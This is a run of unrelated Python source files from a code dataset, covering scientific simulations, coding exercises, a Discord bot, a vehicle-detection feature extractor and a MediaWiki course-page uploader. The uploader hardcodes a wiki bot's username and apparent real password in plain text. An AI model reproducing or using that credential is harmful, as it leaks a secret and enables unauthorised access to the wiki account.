space_comm.Get_rank()\n\n # split world communicator to create time-communicators\n if len(sys.argv) >= 2:\n color = int(world_rank % int(sys.argv[1]))\n else:\n color = int(world_rank / world_size)\n time_comm = comm.Split(color=color)\n # time_size = time_comm.Get_size()\n time_rank = time_comm.Get_rank()\n\n # print(\"IDs (world, space, time): %i / %i -- %i / %i -- %i / %i\" % (world_rank, world_size, space_rank,\n # space_size, time_rank, time_size))\n\n # initialize level parameters\n level_params = dict()\n level_params['restol'] = 1e-08\n level_params['dt'] = 1e-03\n level_params['nsweeps'] = [3, 1]\n\n # initialize sweeper parameters\n sweeper_params = dict()\n sweeper_params['quad_type'] = 'RADAU-RIGHT'\n sweeper_params['num_nodes'] = [3]\n sweeper_params['QI'] = ['LU'] # For the IMEX sweeper, the LU-trick can be activated for the implicit part\n sweeper_params['initial_guess'] = 'zero'\n\n # initialize problem parameters\n problem_params = dict()\n problem_params['nu'] = 2\n problem_params['L'] = 16.0\n problem_params['nvars'] = [(48 * 24, 48 * 24), (8 * 24, 8 * 24)]\n problem_params['eps'] = [0.04]\n problem_params['dw'] = [-0.04]\n problem_params['radius'] = 0.25\n problem_params['comm'] = space_comm\n problem_params['name'] = name\n problem_params['init_type'] = 'circle_rand'\n\n # initialize step parameters\n step_params = dict()\n step_params['maxiter'] = 50\n\n # initialize controller parameters\n controller_params = dict()\n controller_params['logger_level'] = 20 if space_rank == 0 else 99 # set level depending on rank\n # controller_params['hook_class'] = dump\n\n # fill description dictionary for easy step instantiation\n description = dict()\n description['problem_class'] = allencahn_imex\n # description['problem_class'] = allencahn_imex_stab\n description['problem_params'] = problem_params # pass problem parameters\n description['sweeper_class'] = imex_1st_order\n description['sweeper_params'] = sweeper_params # pass sweeper parameters\n description['level_params'] = level_params # pass level parameters\n 
description['step_params'] = step_params # pass step parameters\n description['space_transfer_class'] = pmesh_to_pmesh\n\n # set time parameters\n t0 = 0.0\n Tend = 1 * 0.001\n\n # instantiate controller\n controller = controller_MPI(controller_params=controller_params, description=description, comm=time_comm)\n\n # get initial values on finest level\n P = controller.S.levels[0].prob\n uinit = P.u_exact(t0)\n\n # call main function to get things done...\n uend, stats = controller.run(u0=uinit, t0=t0, Tend=Tend)\n\n if space_rank == 0:\n\n # filter statistics by type (number of iterations)\n iter_counts = get_sorted(stats, type='niter', sortby='time')\n\n print()\n\n niters = np.array([item[1] for item in iter_counts])\n out = f'Mean number of iterations on rank {time_rank}: {np.mean(niters):.4f}'\n print(out)\n\n timing = get_sorted(stats, type='timing_setup', sortby='time')\n out = f'Setup time on rank {time_rank}: {timing[0][1]:.4f} sec.'\n print(out)\n\n timing = get_sorted(stats, type='timing_run', sortby='time')\n out = f'Time to solution on rank {time_rank}: {timing[0][1]:.4f} sec.'\n print(out)\n\n\nif __name__ == \"__main__\":\n # name = 'AC-2D-application'\n name = 'AC-2D-application-forced'\n run_simulation(name=name)\n","sub_path":"pySDC/playgrounds/deprecated/pmesh/AC_2D_application_NEW.py","file_name":"AC_2D_application_NEW.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"550408489","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\" résolution Schrödinger 1D par la méthode FDTD \"\"\"\n\n__author__ = \"Dominique Lefebvre\"\n__copyright__ = \"Copyright 2018 - TangenteX.com\"\n__version__ = \"1.0\"\n__date__ = \"12 septembre 2018\" \n__email__ = \"dominique.lefebvre@tangentex.com\"\n\n# importation des librairies\nfrom scipy import sin, cos, exp, zeros, pi, sqrt, arange\nfrom scipy.constants import h, hbar, e, m_e\nfrom scipy.integrate import simps\nfrom matplotlib.pyplot import figure,axis,plot,pause,show,ion,ioff,savefig,grid,xlabel,ylabel, title\n\n# définition des constantes - les constantes physiques standards sont\n# tirées du package scipy.constants\nDeuxPi = 2.0*pi\nL = 5.0e-9 # dimension de la boite quantique (USI) \n\n# définition du domaine spatial et temporel\nNx = 1001 # nombre de pas d'intégration sur le domaine spatial\nxmin = 0.0\nxmax = L\ndx = (xmax-xmin)/Nx\nx = arange(0.0,L,dx)\n\nNt = 15000 # nombre de pas d'intégration sur le domaine temporel\nPasAff = 1000\na2 = 0.1\ndt = a2*2*m_e*dx**2/hbar\na3 = e*dt/hbar\n\n# définition des paramètres du paquet d'onde inital\nx0 = x[Nx/4] # position initiale du paquet\nsigma = 2.0e-10 # largeur du paquet en m\nLambda = 1.5e-10 # longeur d'onde de de Broglie l'électron (en m)\nEc = (h/Lambda)**2/(2*m_e*e) # énergie cinétique théorique de l'électron (en eV)\n\n# définition du potentiel\nU = zeros(Nx) # particule libre dans le puit\n\n# initialisation des buffers de calcul aux conditions initiales\nPsi_Real = zeros(Nx)\nPsi_Imag = zeros(Nx)\nPsi_Prob = zeros(Nx)\n\n# calcul et affichage de la fonction d'onde initiale\nPsi_Real = exp(-0.5*((x-x0)/sigma)**2)*cos(DeuxPi*(x-x0)/Lambda)\nPsi_Imag = exp(-0.5*((x-x0)/sigma)**2)*sin(DeuxPi*(x-x0)/Lambda)\n# normalisation du paquet d'onde\nPsiPsiC = Psi_Real**2 + Psi_Imag**2\nC = simps(PsiPsiC,x)\nPsi_Real = Psi_Real/sqrt(C)\nPsi_Imag = Psi_Imag/sqrt(C)\nPsi_Prob = Psi_Real**2 + Psi_Imag**2\n\n# initialisation graphique\nion() # mode interactif\nfig = figure()\nymax = 
Psi_Real.max()\naxis([xmin*1.e9,xmax*1.e9,-ymax,ymax])\ngrid(True)\nxlabel('x [nanometre]', fontsize = 15)\nylabel('Amplitude de probabilite', fontsize = 15)\ntitle('Evolution', fontsize = 15)\n\n# tracé de la fonction d'onde initiale\nlinePsiR, = plot(x*1.e9,Psi_Real,'blue')\nlinePsiI, = plot(x*1.e9,Psi_Imag,'red') \nlinePsiP, = plot(x*1.e9,Psi_Prob/1.e5,'green')\n\n# boucle de calcul et d'affichage de l'évolution\nfor t in range(Nt):\n Psi_Real[1:-1] = Psi_Real[1:-1] - a2*(Psi_Imag[2:] - 2*Psi_Imag[1:-1] + Psi_Imag[:-2]) \\\n + a3*U[1:-1]*Psi_Imag[1:-1]\n Psi_Imag[1:-1] = Psi_Imag[1:-1] + a2*(Psi_Real[2:] - 2*Psi_Real[1:-1] + Psi_Real[:-2]) \\\n - a3*U[1:-1]*Psi_Real[1:-1]\n Psi_Prob[1:-1] = Psi_Real[1:-1]**2 + Psi_Imag[1:-1]**2\n if t % PasAff == 0: \n linePsiR.set_ydata(Psi_Real)\n linePsiI.set_ydata(Psi_Imag)\n linePsiP.set_ydata(Psi_Prob/1.e5)\n pause(0.2)\n\nprint('Fin de calcul')\nioff() # sortir du mode interactif\n\n \n","sub_path":"SchrodingerFDTD_1D.py","file_name":"SchrodingerFDTD_1D.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"583229688","text":"class Solution:\n\t# @param {integer} m\n\t# @param {integer} n\n\t# @return {integer}\n\tdef uniquePaths(self, m, n):\n\t\tif(m == 1 or n == 1):\n\t\t\treturn 1\n\t\telse:\n\t\t\td = [[1 for i in range(0, n)] for j in range(0, m)]\n\t\t\t''' 指数复杂度\n\t\t\treturn self.uniquePaths(m - Codeforces Round 352, n) + self.uniquePaths(m, n - Codeforces Round 352)\n\t\t\t'''\n\t\t\tfor i in range(1, m):\n\t\t\t\tfor j in range(1,n):\n\t\t\t\t\td[i][j] = d[i - 1][j] + d[i][j - 1]\n\n\t\t\treturn d[m - 1][n - 1]\n\ns = Solution()\nprint(s.uniquePaths(2, 3))","sub_path":"Python/062M_Unique_Paths.py","file_name":"062M_Unique_Paths.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"639953389","text":"#!/usr/bin/python\n\n\"\"\" \n This is the code to accompany the Lesson 2 (SVM) mini-project.\n\n Use a SVM to identify emails from the Enron corpus by their authors: \n Sara has label 0\n Chris has label 1\n\"\"\"\n \nimport sys\nfrom time import time\nsys.path.append(\"../tools/\")\nfrom email_preprocess import preprocess\n\n\n### features_train and features_test are the features for the training\n### and testing datasets, respectively\n### labels_train and labels_test are the corresponding item labels\nfeatures_train, features_test, labels_train, labels_test = preprocess()\n\n\n\n#########################################################\n### your code goes here ###\n\nfrom sklearn.svm import SVC\n#clf = SVC(kernel=\"linear\")\n\nC = 10000.0\nclf = SVC(kernel=\"rbf\", C=C)\n\nprint(\"C: \"+str(C))\n\n# train on only 1% of the data set\n#features_train = features_train[:len(features_train)/100]\n#labels_train = labels_train[:len(labels_train)/100]\n\nt0 = time()\nclf.fit(features_train, labels_train)\nprint(\"training time: \"+str(round(time()-t0, 3)))\n\n\nt0 = time()\npred = clf.predict(features_test)\nprint(\"testing time: \"+str(round(time()-t0, 3)))\n\nacc = clf.score(features_test, labels_test)\nprint(\"accuracy: \"+str(acc))\n#########################################################\n\ntotal = len(pred)\nchris = sum(pred)\nprint(\"out of \"+str(total)+\" test events, a sum of 1's gives us chris\")\nprint(\"chris = \"+str(chris))\nprint(\"sara = \"+str(total-chris))\n\n\na1 = pred[10]\nprint(\"10: \"+str(a1))\na2 = pred[26]\nprint(\"26: 
\"+str(a2))\na3 = pred[50]\nprint(\"50: \"+str(a3))\n","sub_path":"svm/svm_author_id.py","file_name":"svm_author_id.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"210432189","text":"import discord\nfrom discord.ext import commands\n\nbot = commands.Bot(command_prefix=\"$\")\n\n\nclass test_discord():\n relaying_channels = {\n 'test-1': 'test-2'\n }\n relaying_prefix = ''\n relaying_suffix = '<@&816054356091994164>'\n relaying_ignore_roles = {\n #816054356091994164\n }\n\n command_channels = {\n 'bot-commands',\n }\n command_always_accept_from_roles = {\n 816054356091994164\n }\n\n rp_active_role_name = 'epic role'\n rp_active_role_id = 816054356091994164\n\n\n@bot.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(bot))\n\n\ndef _validate_command(ctx: commands.Context) -> bool:\n if ctx.author == bot.user:\n return False\n\n if ctx.channel.name in guild_details.command_channels:\n return True\n\n for role in ctx.author.roles:\n if role.id in guild_details.command_always_accept_from_roles:\n return True\n\n return False\n\n\n@bot.command(\n name='ping',\n brief='Returns Pong. Used to check if the bot is up and running',\n help=('Returns Pong. If the bot does not respond, it means it is down or something terrible '\n 'has happened.'),\n)\nasync def ping(ctx: commands.Context):\n if not _validate_command(ctx):\n return\n\n await ctx.channel.send('Pong.')\n\n\n@bot.command(\n name='rpactive',\n brief='Changes your RP Active status',\n help=('If you did not have the RP Active role, the bot will give it to you. If you already had '\n 'it, the bot will take it away from you.'),\n)\nasync def rpactive(ctx: commands.Context):\n if not _validate_command(ctx):\n return\n\n rp_active_role = discord.utils.get(ctx.message.guild.roles,\n name=guild_details.rp_active_role_name)\n\n user = ctx.author\n has_rp_active = False\n\n for role in user.roles:\n if role.id == guild_details.rp_active_role_id:\n has_rp_active = True\n\n if has_rp_active:\n await user.remove_roles(rp_active_role)\n await ctx.send(f'Removed role **{guild_details.rp_active_role_name}**.')\n else:\n await user.add_roles(rp_active_role)\n await ctx.send(f'Added role **{guild_details.rp_active_role_name}**.')\n\n\n@bot.event\nasync def on_command_error(ctx, error):\n if isinstance(error, commands.CommandNotFound):\n # No need to do anything fancy here\n return\n raise error\n\n\n@bot.event\nasync def on_message(message):\n if message.author == bot.user:\n return\n\n if message.channel.name in guild_details.relaying_channels:\n await _relay_message(\n message,\n prefix=guild_details.relaying_prefix,\n suffix=guild_details.relaying_suffix)\n\n await bot.process_commands(message)\n\n\ndef get_channel(name):\n channel = discord.utils.get(bot.get_all_channels(), name=name)\n if not channel:\n raise ValueError(f'Target channel {name} not found.')\n return channel\n\n\nasync def _relay_message(message, prefix='', suffix=''):\n for role in message.author.roles:\n if role.id in guild_details.relaying_ignore_roles:\n return\n\n to_channel_name = guild_details.relaying_channels[message.channel.name]\n to_channel = get_channel(to_channel_name)\n relay_format = (\n '**RELAYED MESSAGE**\\r\\n'\n '**User**: {message.author.name}#{message.author.discriminator} (<@{message.author.id}>)\\r\\n'\n '**Channel**: <#{message.channel.id}>\\r\\n'\n '**Time**: {message.created_at}\\r\\n'\n '**Message**: {message.content}\\r\\n'\n )\n if 
prefix:\n relay_format = '{prefix}\\r\\n' + relay_format\n if suffix:\n relay_format += '{suffix}'\n\n final_message = relay_format.format(\n message=message,\n prefix=prefix,\n suffix=suffix,\n )\n\n await message.delete()\n await to_channel.send(final_message)\n\n\nif __name__ == '__main__':\n production = True # Change to True for use in public servers, False for test server\n if production:\n token_file = '.token'\n from DRO_Discord import DRO_discord\n guild_details = DRO_discord()\n else:\n token_file = 'test.token'\n guild_details = test_discord()\n print('THIS IS A TEST BOT')\n\n try:\n with open(token_file, 'r') as f:\n token = f.read()\n if not token:\n raise RuntimeError\n except (OSError, RuntimeError):\n raise RuntimeError(f'No token file or contents found: {token_file}')\n\n bot.run(token)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"636981780","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 8 00:04:06 2016\n\n@author: seven\n\"\"\"\n\nfrom astropy.io import fits\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nfrom scipy import integrate\n\no=fits.open('/home/seven/Downloads/O7Ia.fits')\nb=fits.open('/home/seven/Downloads/B5V.fits')\na=fits.open('/home/seven/Downloads/A2Vs.fits')\nf=fits.open('/home/seven/Downloads/F8V.fits')\ng=fits.open('/home/seven/Downloads/G5VCH0.3.fits')\nk=fits.open('/home/seven/Downloads/K1V.fits')\nm=fits.open('/home/seven/Downloads/M0V.fits')\n\nmass_min=0.08 #unit: mass of the Sun\nmass_max=80\nnum=[]\n\ndef IMF(x):\n return x**(-2.35) #from wiki initial mass function\n\nNUM=integrate.quad(IMF, 0.08, 80)[0]\nnum.append(integrate.quad(IMF, 16, 80)[0]/NUM) #from wiki stellar classification\nnum.append(integrate.quad(IMF, 2.1, 16)[0]/NUM)\nnum.append(integrate.quad(IMF, 1.4, 2.1)[0]/NUM)\nnum.append(integrate.quad(IMF, 1.04, 1.4)[0]/NUM)\nnum.append(integrate.quad(IMF, 0.8, 1.04)[0]/NUM)\nnum.append(integrate.quad(IMF, 0.45, 0.8)[0]/NUM)\nnum.append(integrate.quad(IMF, 0.08, 0.45)[0]/NUM)\n\n\nU=[3.8,3.65,5.07,7.22,7.370,8.95,11.187]\nB=[4.8,4.20,4.95,7.27,7.050,8.59,9.892]\nV=[4.95,4.36,4.80,6.75,6.360,7.80,8.470]\nd=[1.71,5.45,20.21,28.9,42.12,42.76,94.60]\nmass=[48,9,1.8,1.22,0.92,0.62,0.27]# mean age, i.e. 
48=(16+80)/2\nlife=[]\nfor i in range (7):\n if mass[i]<1:\n life.append((1/mass[i])**2)#stellar age, unit: Gyr\n else:\n life.append((1/mass[i])**3)\n \n \nu_g=[]\ng_r=[]\n\nfor k in range(7):\n LU=0\n LB=0\n LV=0\n for j in range(7-k):\n i=j+k\n LU=LU+10**(-U[i]*0.4)*num[i]*(1000/d[i])**2#flux = SUM(10^(-m/2.5)*number_of_star/distance^2) --> same distance\n LV=LV+10**(-V[i]*0.4)*num[i]*(1000/d[i])**2\n LB=LB+10**(-B[i]*0.4)*num[i]*(1000/d[i])**2\n\n mU=-2.5*math.log10(LU)+5 #magnitude=-2.5log10(flux)\n mV=-2.5*math.log10(LV)+5\n mB=-2.5*math.log10(LB)+5\n\n\n if mU-mB<0:\n u_g.append(1.28*(mU-mB) + 1.14) #http://classic.sdss.org/dr4/algorithms/sdssUBVRITransform.html\n g_r.append(1.09*(mB-mV) - 0.23)\n else:\n u_g.append(1.28*(mU-mB) + 1.13)\n g_r.append(1.02*(mB-mV) - 0.22)\n\nplt.semilogx(life,u_g,'r+-',label='u-g') \nplt.semilogx(life,g_r,'b^-',label='g-r') \nplt.legend(loc='upper left')\nplt.xlabel('Age/Gyr')\nplt.ylabel('color')\nplt.title('color evolution diagram')\nplt.show()","sub_path":"eric/homework2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"117195145","text":"#!/bin/python3\n\nimport csv\nimport sys\nimport json\n\nfrom simplemediawiki import MediaWiki\n\ndef pretty_print(data):\n print(json.dumps(data, indent=2, separators=(',', ': ')))\n\nteachers = {\n 'DURET-LUTZ.Alexandre': '[[User:Adl]]',\n 'RICOU.Olivier': '[[User:Ricou]]',\n 'GERAUD.Thierry': '[[User:Theo]]',\n 'LEVILLAIN.Roland': '[[User:Roland]]',\n 'DEHAK.Reda': '[[User:Reda]]',\n 'DEMAILLE.Akim': '[[User:Akim]]',\n 'VERNA.Didier': '[[User:Didier]]',\n 'FABRIZZIO.Johnatan': '[[User:Jonathan]]',\n 'DEMOULINS.Clément': '[[User:Cd]]'\n}\n\naudiences = {\n '': 'InfoSub',\n '': 'InfoSpé',\n '': 'Tronc-commun',\n '': 'Majeure',\n '': 'Apprentis',\n '': 'Cycle Ing',\n '': 'CSI',\n '': 'SCIA'\n}\n\nlabels = {\n 'intitule': 'title',\n 'code': 'acronym',\n 'enseignant-officiel': 'teacher',\n 'annee': 'period',\n 'orientation': 'audience',\n}\n\ndef process(wiki, csvfile):\n reader = csv.reader(csvfile, delimiter=';', quotechar='|')\n for row in reader:\n if reader.line_num == 1:\n fields = row\n continue\n items = zip(fields, row)\n course = \"{{Course\\n\"\n data = {}\n for (name, value) in items:\n name = name.lower()\n value = value.strip()\n if name in labels:\n name = labels[name]\n data[name] = value\n if name == 'teacher':\n course += \"| {} = {}\\n\".format(name, teachers[value])\n else:\n course += \"| {} = {}\\n\".format(name, value)\n course += \"}}\\n\"\n print(course)\n #title = \"{} ({})\".format(data['intitule'], data['code'])\n #title = title.replace('[', '').replace(']', '')\n #pretty_print(wiki.update_page(title=title, content=course))\n\ndef main():\n wiki = MediaWiki('https://www.lrde.epita.fr/api.php')\n wiki.login('Bot', 'raiQuaef4hooyu7eoZ6t', 'local')\n print(\"# Connected to %s\" % wiki.call2(action='query', meta='siteinfo')['query']['general']['sitename'])\n\n for arg in sys.argv[1:]:\n with open(arg) as csvfile:\n process(wiki, csvfile)\n sys.exit()\n\n wiki.logout()\n\nif __name__ == '__main__':\n main()\n","sub_path":".dotfiles/bin/update_courses.py","file_name":"update_courses.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"442078631","text":"\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2\nfrom skimage.feature import hog\nfrom image_processing import 
*\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef get_hog_features(img, orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True):\n # Call with two outputs if vis==True\n if vis == True:\n features, hog_image = hog(img, orientations=orient, pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), transform_sqrt=True, \n visualise=vis, feature_vector=feature_vec)\n return features, hog_image\n # Otherwise call with one output\n else: \n features = hog(img, orientations=orient, pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), transform_sqrt=True, \n visualise=vis, feature_vector=feature_vec)\n return features\n\ndef bin_spatial(img, size=(32, 32)):\n return cv2.resize(img, size).ravel()\n \ndef color_hist(img, nbins=32): #bins_range=(0, 256)\n # Compute the histogram of the color channels separately\n channel1_hist = np.histogram(img[:,:,0], bins=nbins)\n channel2_hist = np.histogram(img[:,:,1], bins=nbins)\n channel3_hist = np.histogram(img[:,:,2], bins=nbins)\n # Concatenate the histograms into a single feature vector\n hist_features = np.concatenate((channel1_hist[0], channel2_hist[0], channel3_hist[0]))\n # Return the individual histograms, bin_centers and feature vector\n return hist_features\n\n\ndef extract_features(path, file_type=\"jpg\", color_space='RGB', \n spatial_size=(32, 32), hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2, hog_channel=0,\n spatial_feat=True, hist_feat=True, hog_feat=True, vis=False):\n # Create a list to append feature vectors to\n features = []\n # Iterate through the list of images\n for file_path in path:\n img = read_image(file_path, file_type)\n \n features.append(single_img_features(img, color_space=color_space, \n spatial_size=spatial_size,\n hist_bins=hist_bins, orient=orient, \n pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, \n spatial_feat=spatial_feat, \n hist_feat=hist_feat, \n hog_feat=hog_feat, vis=vis))\n # Return list of feature vectors\n return features\n\n\n# Define a function to extract features from a single image window\n# This function is very similar to extract_features()\n# just for a single image rather than list of images\ndef single_img_features(img, color_space='RGB', spatial_size=(32, 32),\n hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2, hog_channel=0,\n spatial_feat=True, hist_feat=True, hog_feat=True,\n vis=False): \n #1) Define an empty list to receive features\n img_features = []\n #2) Apply color conversion if other than 'RGB'\n if color_space != 'RGB':\n if color_space == 'HSV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n else: feature_image = np.copy(img) \n #3) Compute spatial features if flag is set\n if spatial_feat == True:\n spatial_features = bin_spatial(feature_image, size=spatial_size)\n #4) Append features to list\n img_features.append(spatial_features)\n #5) Compute histogram features if flag is set\n if hist_feat == True:\n hist_features = color_hist(feature_image, nbins=hist_bins)\n #6) Append features to list\n img_features.append(hist_features)\n #7) Compute HOG features if flag is 
set\n if hog_feat == True:\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(feature_image.shape[2]):\n hog_features.append(get_hog_features(feature_image[:,:,channel], \n orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True))\n hog_features = np.concatenate(hog_features)\n else:\n if vis == True:\n hog_features, hog_image = get_hog_features(feature_image[:,:,hog_channel], orient,\n pix_per_cell, cell_per_block, vis=vis, feature_vec=True)\n else:\n hog_features = get_hog_features(feature_image[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block, vis=False, feature_vec=True)\n #8) Append features to list\n img_features.append(hog_features)\n \n if vis == True:\n #9) Return concatenated array of features and hog image\n return np.concatenate(img_features), hog_image\n else:\n return np.concatenate(img_features)\n\ndef feature_subsample(img, ystart, ystop, scale, svc, X_scaler, orient,\n pix_per_cell, cell_per_block, spatial_size, hist_bins):\n draw_img = np.copy(img)\n #img = img.astype(np.float32)/255\n heat = np.zeros_like(img[:,:,0]).astype(np.float)\n \n img_tosearch = img[ystart:ystop,:,:]\n ctrans_tosearch = rgb_to_colorspace(img_tosearch, color_space='YCrCb')\n if scale != 1:\n imshape = ctrans_tosearch.shape\n ctrans_tosearch = cv2.resize(ctrans_tosearch, (np.int(imshape[1]/scale), np.int(imshape[0]/scale)))\n \n ch1 = ctrans_tosearch[:,:,0]\n ch2 = ctrans_tosearch[:,:,1]\n ch3 = ctrans_tosearch[:,:,2]\n\n # Define blocks and steps as above\n nxblocks = (ch1.shape[1] // pix_per_cell)-1\n nyblocks = (ch1.shape[0] // pix_per_cell)-1 \n nfeat_per_block = orient*cell_per_block**2\n # 64 was the orginal sampling rate, with 8 cells and 8 pix per cell\n window = 64\n nblocks_per_window = (window // pix_per_cell)-1 \n cells_per_step = 2 # Instead of overlap, define how many cells to step\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step\n \n # Compute individual channel HOG features for the entire image\n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog2 = get_hog_features(ch2, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog3 = get_hog_features(ch3, orient, pix_per_cell, cell_per_block, feature_vec=False)\n \n for xb in range(nxsteps):\n for yb in range(nysteps):\n ypos = yb*cells_per_step\n xpos = xb*cells_per_step\n # Extract HOG for this patch\n hog_feat1 = hog1[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_feat2 = hog2[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_feat3 = hog3[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\n\n # Where are we in pixel space for this particular cell\n xleft = xpos*pix_per_cell\n ytop = ypos*pix_per_cell\n\n # Extract the image patch\n subimg = cv2.resize(ctrans_tosearch[ytop:ytop+window, xleft:xleft+window], (64,64))\n \n # Get color features\n spatial_features = bin_spatial(subimg, size=spatial_size)\n hist_features = color_hist(subimg, nbins=hist_bins)\n\n # Scale features and make a prediction\n test_features = X_scaler.transform(np.hstack((spatial_features, hist_features, hog_features)).reshape(1, -1)) \n #test_features = X_scaler.transform(np.hstack((shape_feat, hist_feat)).reshape(1, -1)) \n test_prediction = svc.predict(test_features)\n \n if test_prediction == 1:\n xbox_left = np.int(xleft*scale)\n ytop_draw = np.int(ytop*scale)\n 
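# note: the strip being searched was shrunk by a factor of 1/scale above, so a
# hit found at (xleft, ytop) in the resized strip is mapped back to original
# frame pixels by multiplying by scale before the box is drawn.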
win_draw = np.int(window*scale)\n cv2.rectangle(draw_img,(xbox_left, ytop_draw+ystart),(xbox_left+win_draw,ytop_draw+win_draw+ystart),(0,0,255),6) \n heat[ytop_draw+ystart:ytop_draw+win_draw+ystart, xbox_left:xbox_left+win_draw] += 1\n return draw_img, heat\n\ndef scale_training_features(features):\n #features = np.array(features).astype(np.float64)\n scaler = StandardScaler()\n scaler.fit(features)\n features = scaler.transform(features)\n return features, scaler\n\nif __name__ == \"__main__\":\n pass","sub_path":"extract_feature.py","file_name":"extract_feature.py","file_ext":"py","file_size_in_byte":9283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"49318135","text":"import psutil\nimport logging\nimport sys\n\n\ndef file_is_free(fpath):\n # if any process has file handle opened for this file, than it is not free\n for proc in psutil.process_iter():\n try:\n for item in proc.open_files():\n if fpath == item.path:\n return False\n except Exception:\n pass\n\n return True\n\n\ndef get_logger(name, prefix):\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter(prefix + ': %(asctime)s\\t%(levelname)s\\t%(message)s')\n ch = logging.StreamHandler(stream=sys.stdout)\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n return logger\n","sub_path":"nginx/src/ekirill/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"637112155","text":"limit = int(input('Podaj limit predkosci: '))\npred = int(input('Podaj predkosc pojazdu: '))\nroznica = pred - limit\ncounter = -10\nif roznica <= 0:\n print('Bez mandatu')\nelif roznica > 0 and roznica <= 10:\n print(f'Mandat: {roznica*5}')\nelif roznica > 10:\n for i in range(roznica):\n counter += 1\n print(f'Mandat: {50+counter*15}')","sub_path":"02-ControlStructures/44.py","file_name":"44.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"390174992","text":"# https://leetcode.com/problems/defanging-an-ip-address/\ndef defangIPaddr(address):\n defanged = str()\n for i in address:\n try:\n ip_int = int(i)\n defanged = defanged + str(ip_int)\n except:\n defanged = defanged + '[' + i + ']'\n return defanged\n\n\nprint(defangIPaddr(\"1.1.1.1\"))\nprint(defangIPaddr(\"255.100.50.0\"))\n","sub_path":"defang_ipaddress.py","file_name":"defang_ipaddress.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"352684023","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
